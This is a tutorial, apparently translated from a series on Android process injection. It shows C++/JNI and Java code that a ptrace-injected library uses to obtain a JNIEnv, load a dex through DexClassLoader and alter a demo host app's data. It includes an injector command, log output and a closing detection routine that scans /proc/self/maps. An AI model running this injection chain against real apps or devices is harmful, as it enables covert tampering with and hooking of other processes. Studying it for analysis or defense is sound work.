Attack Android injection 4

Source: Internet
Author: User

This article continues the injection technique introduced in articles 1, 2 and 3 and explains what has to be done after the injection itself. If you are already familiar with the injection technique you can read this chapter directly; otherwise it is better to read the first three articles first.
Completing the injection is only the first step of a long journey. As we all know, Android application processes are child processes forked from Zygote, and each of them runs its own independent JVM. Through ptrace injection we get the chance to execute code inside the target process, but that is still some way from modifying the contents of the JVM. Let's look at the key code of the SO injected in article 2:

    #include <pthread.h>
    #include <cstddef>

    void Main();    // the library's real entry point, defined elsewhere

    // Thread body: run Main() on its own thread so the host's main thread is left alone.
    static void* _main(void*) {
        Main();
        return NULL;
    }

    // A global object: its constructor runs when the SO is loaded and starts the worker thread.
    class EntryClass {
    public:
        EntryClass() {
            pthread_t tid;
            pthread_create(&tid, NULL, _main, NULL);
            pthread_detach(tid);
        }
    } boy;
When the SO is injected, our logic actually runs on a plain Linux thread; this is deliberate, to avoid interfering with the main thread. Our goal is to reach the Java layer, and JNI is the natural way to interact with it. However, one essential element is missing: the JNIEnv. Without it, no JNI call can be made.
As discussed in article 3, the JavaVM is globally unique within a JVM process, while a JNIEnv is allocated per thread, and Dalvik threads correspond one to one with Linux threads. So we can attach our thread to the JavaVM and the JavaVM will allocate a JNIEnv for us. Reading the Dalvik source shows that the JavaVM address can be obtained from AndroidRuntime, after which the JavaVM's AttachCurrentThread and DetachCurrentThread functions give us, and later release, the JNIEnv. The sample code is as follows:
    JNIEnv* jni_env = NULL;
    JavaVM* jvm = AndroidRuntime::getJavaVM();            // the process-wide JavaVM
    jint rc = jvm->AttachCurrentThread(&jni_env, NULL);   // rc == JNI_OK on success; jni_env is then valid on this thread
    // TODO: use jni_env here
    jvm->DetachCurrentThread();                           // release the thread's JNIEnv when finished
So far we have obtained the crucial JNIEnv object. Next we load our dex file through DexClassLoader. The key code follows. First, find the system class loader:
    // ClassLoader.getSystemClassLoader()
    // jni_env, sig_buffer and the JCLASS_LOADER signature string are globals of the injected library
    static jobject getSystemClassLoader() {
        jclass class_loader_claxx = jni_env->FindClass("java/lang/ClassLoader");
        snprintf(sig_buffer, 512, "()%s", JCLASS_LOADER);
        jmethodID getSystemClassLoader_method = jni_env->GetStaticMethodID(class_loader_claxx, "getSystemClassLoader", sig_buffer);
        return jni_env->CallStaticObjectMethod(class_loader_claxx, getSystemClassLoader_method);
    }
Then, use SystemClassLoader to generate the DexClassLoader object.
    // dalvik.system.DexClassLoader(String dexPath, String optimizedDirectory, String librarySearchPath, ClassLoader parent)
    jclass dexloader_claxx = jni_env->FindClass("dalvik/system/DexClassLoader");
    snprintf(sig_buffer, 512, "(%s%s%s%s)V", JSTRING, JSTRING, JSTRING, JCLASS_LOADER);
    jmethodID dexloader_init_method = jni_env->GetMethodID(dexloader_claxx, "<init>", sig_buffer);
    snprintf(sig_buffer, 512, "(%s)%s", JSTRING, JCLASS);
    jmethodID loadClass_method = jni_env->GetMethodID(dexloader_claxx, "loadClass", sig_buffer);
    jobject class_loader = getSystemClassLoader();
    check_value(class_loader);
    // apk_path and dex_out_path are jstrings: the path of the dex/apk and the directory for the optimized dex
    jobject dex_loader_obj = jni_env->NewObject(dexloader_claxx, dexloader_init_method, apk_path, dex_out_path, NULL, class_loader);
Finally, load the dex through dex_loader_obj, find the entry point of our custom method, and call it:
    jstring class_name = jni_env->NewStringUTF("com.demo.inject2.EntryClass");
    jclass entry_class = static_cast<jclass>(jni_env->CallObjectMethod(dex_loader_obj, loadClass_method, class_name));
    // public static Object[] invoke(int)
    jmethodID invoke_method = jni_env->GetStaticMethodID(entry_class, "invoke", "(I)[Ljava/lang/Object;");
    check_value(invoke_method);
    jobjectArray objectarray = (jobjectArray) jni_env->CallStaticObjectMethod(entry_class, invoke_method, 0);
So far, our dex logic has been executed. The entry class is com.demo.inject2.EntryClass; its invoke method reuses the approach of com.demo.inject to modify, once more, the data printed by com.demo.host (the same process is injected twice in a row, which must be painful for it). Let's look at the invoke code in inject2:
    package com.demo.inject2;

    import java.lang.reflect.Method;

    import android.content.Context;
    import android.util.Log;

    /**
     * @author boyliang
     */
    public final class EntryClass {
        public static Object[] invoke(int i) {
            try {
                Log.i("TTT", ">>>>>>>>>>>>>I am in, I am a bad boy 2!!!!<<<<<<<<<<<<<<");
                Context context = ContexHunter.getContext();
                Class<?> MainActivity_class = context.getClassLoader().loadClass("com.demo.host.MainActivity");
                Method setA_method = MainActivity_class.getDeclaredMethod("setA", int.class);
                setA_method.invoke(null, 1);
            } catch (Exception e) {
                e.printStackTrace();
            }
            return null;
        }
    }
The code is very similar to the example in article 3, but the entry point is different. Note that the parent-delegation model of class loaders also imposes restrictions here.
Output
    am start com.demo.host/.MainActivity
    ./Poison /data/local/tmp/libimportdex.so 738

Let's look at the output, compared with article 3:
    com.demo.inject starts.
    I/TTT     (  738): com.demo.host starts
    I/TTT     (  738): 1
    I/TTT     (  738): 2
    I/TTT     (  738): 3
    I/TTT     (  738): 4
    I/TTT     (  738): 5
    I/TTT     (  738): >>>>>>>>>>>>>I am in, I am a bad boy!!!!<<<<<<<<<<<<<<
    I/TTT     (  738): 998
    I/TTT     (  738): 999
    I/TTT     (  738): 1000
    I/TTT     (  738): 1001
    I/TTT     (  738): 1002
    I/TTT     (  738): 1003
    I/TTT     (  738): >>>>>>>>>>>>>I am in, I am a bad boy 2!!!!<<<<<<<<<<<<<<
    I/TTT     (  738): 1
    I/TTT     (  738): 2
    I/TTT     (  738): 3
    I/TTT     (  738): 4
    I/TTT     (  738): 5
    I/TTT     (  738): 6
    I/TTT     (  738): 7
The two marker strings in the output show that both injections and their modifications succeeded. All code of the example has been uploaded to https://github.com/boyliang/Java_Injection
So far we have implemented the following: inject the target process and obtain a JNIEnv, load a dex into the target process, and execute a chosen method. One step remains before we reach our goal: intercepting the broadcastIntent method. In article 5 I will introduce another technique, BinderProxy, through which any method of a Binder service can be intercepted.
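The chain above leaves two traces in the host process: a library mapped from /data/local/tmp and a dex loaded from a path the app never uses. As an added example (not code from the article or its repository), here is a C self-check that an app's native code could run over /proc/self/maps to flag code mapped from such directories; the directory list and the sample maps dump are constructed assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Directories a stock app has no reason to map code from (assumed list). */
static const char *const suspicious_dirs[] = { "/data/local/tmp/", "/sdcard/", "/storage/", NULL };

static int has_suffix(const char *s, const char *x) {
    size_t ls = strlen(s), lx = strlen(x);
    return ls >= lx && strcmp(s + ls - lx, x) == 0;
}

/* 1 if one maps line (addr perms offset dev inode [path]) maps a code file from a suspicious dir. */
int suspicious_mapping(const char *line) {
    char path[512];
    if (sscanf(line, "%*s %*s %*s %*s %*s %511s", path) != 1)
        return 0;                                   /* anonymous mapping: no path */
    if (!(has_suffix(path, ".so") || has_suffix(path, ".dex") || has_suffix(path, ".odex") ||
          has_suffix(path, ".jar") || has_suffix(path, ".apk")))
        return 0;
    for (int i = 0; suspicious_dirs[i]; i++)
        if (strncmp(path, suspicious_dirs[i], strlen(suspicious_dirs[i])) == 0)
            return 1;
    return 0;
}

/* Count suspicious code mappings in a newline-separated maps dump. */
int count_suspicious(const char *maps) {
    int n = 0; char line[1024];
    while (*maps) {
        const char *nl = strchr(maps, '\n');
        size_t full = nl ? (size_t)(nl - maps) : strlen(maps);
        size_t len = full < sizeof line ? full : sizeof line - 1;   /* truncate over-long lines */
        memcpy(line, maps, len); line[len] = '\0';
        n += suspicious_mapping(line);
        maps = nl ? nl + 1 : maps + full;
    }
    return n;
}

/* Constructed sample: a system library, the injected library, an injected dex, an anonymous region. */
const char *sample_maps =
    "7f1a000000-7f1a020000 r-xp 00000000 fd:00 1234 /system/lib64/libc.so\n"
    "7f1c000000-7f1c004000 r-xp 00000000 fd:00 9999 /data/local/tmp/libimportdex.so\n"
    "7f1d000000-7f1d002000 r--p 00000000 fd:00 4242 /data/local/tmp/inject2.dex\n"
    "7f1e000000-7f1e001000 rw-p 00000000 00:00 0\n";

int main(void) {   /* on device, read /proc/self/maps into a buffer instead of sample_maps */
    printf("%d suspicious code mappings\n", count_suspicious(sample_maps));   /* prints 2 */
    return 0;
}
```

This is a heuristic only: a privileged attacker can evade it, so treat a hit as one signal the app reports rather than as proof of injection.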